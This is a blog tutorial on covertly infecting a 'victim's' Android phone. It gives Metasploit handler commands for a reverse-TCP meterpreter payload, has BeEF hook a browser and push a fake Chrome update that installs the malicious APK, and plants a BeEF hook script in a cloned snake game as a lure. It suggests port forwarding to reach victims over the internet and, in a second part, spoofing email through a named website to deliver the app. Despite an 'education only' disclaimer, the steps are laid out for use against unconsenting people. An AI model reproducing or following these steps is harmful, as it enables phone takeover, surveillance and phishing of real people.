Home / Android / Install apps without touching phone

Install apps without touching phone

Spread the love





As I promise you in the previous article that my next post will be related to android hacking. In this article, you will learn how to install apps in your victim phone easily or without touching his/her phone.

I know it is not easy to take someone phone then install the ap and if you forget to open the app then no results.

If you have any problem, suggestion let me know by comments I help everyone.

Note: This is for education purpose only. Please don’t misuse it.

Requirements

  • beef
  • metasploit
  • Patience  (most of the readers don’t have patience )

Practical

We will create an android payload or virus or malicious app using Metasploit. I already posted here to generated android payload using Metasploit check it.

After creating the app, you launch Metasploit and wait for receiving the connection. Here are commands

service postresql start;msfconsole

It will launch Metasploit. Further commands

use exploit/multi/handler;set payload android/meterpreter/reverse_tcp;set lhost <local IP address>; set lport 4444

Remain this terminal as and follow further steps.

Launch beef. In Kali, you can start from the sidebar.launch beef in kali linux

In parrot or any other security distribution, you can launch using this command.

beef-xss

Beef is browser exploitation framework. No matter either victim is using chrome, firefox you will not face any problem.

As you can see in the screenshot, it asks for the username and password. These are default username and password.

beef

beef

beef default username-password

After the successful login, a new webpage will open where in the sidebar, there are two directories online browser and offline browser. We can hook browser using a script then we will able to run own codes to the victim browser. When you hook a browser, it will show in the online browser. If it is confusing, don’t worry you will understand everything.

Beef also launch a terminal when you start it. Here is the screenshot of terminal I have highlighted the example remember it we will use in future.hook browser example

To hook own browser visit this link http://127.0.0.1:3000/demos/basic.html or insert script tag. When you open this beef will show something like this.

hooked browser

Meaning you hooked your browser (127.0.0.1 mean your browser).  Click on 127.0.0.1 and choose commands. In the commands tab expend social engineering and pick Fake update bar (chrome) because I’m using chrome you can find victim browser using details tab.fake update for android hacking

Open a new terminal and type ifconfig to find your IP address.

In my case, it is 192.168.43.7.

To hook a victim, my URL will be http://192.168.43.7:3000/demos/basic.html.

Connect your phone to the same network that you are using on your computer. Open this URL on the android phone here is what I got on the beef control panel. In the commands expend social engineering and choose Fake update bar (chrome) because I’m using chrome you can find browser using details tab.

In the URL we will place our android payload URL. You can upload payload to the very famous website like google drive or start own server.

fake update for android hacking

Just run this command.

service apache2 start

After this copy your android virus that you generated in the first step to /var/www/ directory. So URL of the Android virus is http://<IP>/appname.apk

I think you know how to find local IP address. Paste in URL tab of beef and click on execute.

On executing your android phone will show you something like this.

installl missing plugins (hack android phone using metasploit

If you choose Install Missing Plugins, then the app will start downloading.hack android phone

Tap on open, the app asks for installation. After installing when you open it, you will be in the browser app (because our app will display nothing). installl and opening app

But we will get a meterpreter session.
session open

I already posted how to hide app icon, get meterpreter season again and again in the first post of Android hacking.

How to perform a real task

In the actual case, we can’t send the link like this. Your victim will close tab immediately. So we should create something engaging.

I found a snake script. It is the game developed using JavaScript you can download it from GitHub.

Note: This game only works with arrow keys. Maybe android user will be unable to play the game. So we will show install missing plugins to play the game.

Here are simple steps to do this.

First of clone this game from Github.

git clone https://github.com/Mariacristina88/Snake-game.git; cp -r ./Snake-game /var/www/html; nano  /var/www/html/Snake-game/snakegame.html

If above Linux commands confuse you then read my Linux commands for beginners post. Semicolon (;) is used to run two or more commands in the single line.

It will download and copy the game to HTML folder and open snakefile.html. Just insert this script tag.

<script src="http://192.168.43.60:3000/hook.js"></script>

Press ctrl+o to save ctrl+x to exit.

Now, send URL http://192.168.43.60/Snake-game/snakegame.html to your victim. You can port forward your router to perform it over the internet.

Now when our victim opens the link, he will see something like this.how to hack android phone part 2

And we will get hook that browser.  After that repeat above steps to install apps

Tip: you can add custom CSS to make fake update clear. So our victim will install app successfully.

Part-2 Email spoofing

As clear from its name we will spoof our email address. I mean you can send email from any address (yeah from even bill gates email address, do you have bill gates email address?). To spoof an email address, you need only SMTP settings.

Don’t confuse by above words there are tools and websites.

I use https://emkei.cz/ For sending spoofing emails.

This website has a straightforward interface. Just enter to, from, subject, message and send the message.

But Gmail service will catch it and move emails to spam.

In case if your victim is using webmail service then 99% chances are that your message will appear in the inbox.

Here is the screenshot of mail I send to my webmail using this website. fake email example

Thus using spoofing email, you send the malicious app to your victim. Just make sure your message should be real and quick.

Problem with this method is who used webmail on the android phone, or my victim is using Gmail.

Well, this is part of social engineering. You should find your way to hack your victim phone. Don’t we will go further in advance of Android hacking but due to exams i will publish next article in futue.

 





Source link

About Umesh

Umesh Kumar is an indian and part time blogger, He is studying of Computer Science, He really likes and passionate About Blogging, write articles.

Check Also

Amazon Pay Level Quiz – Play To Win Rs.5000 Amazon Pay Balance (Answer Added)

Spread the love Hiya, everybody TrickFi right here with the one other submit on Amazon …

Leave a Reply

Your email address will not be published. Required fields are marked *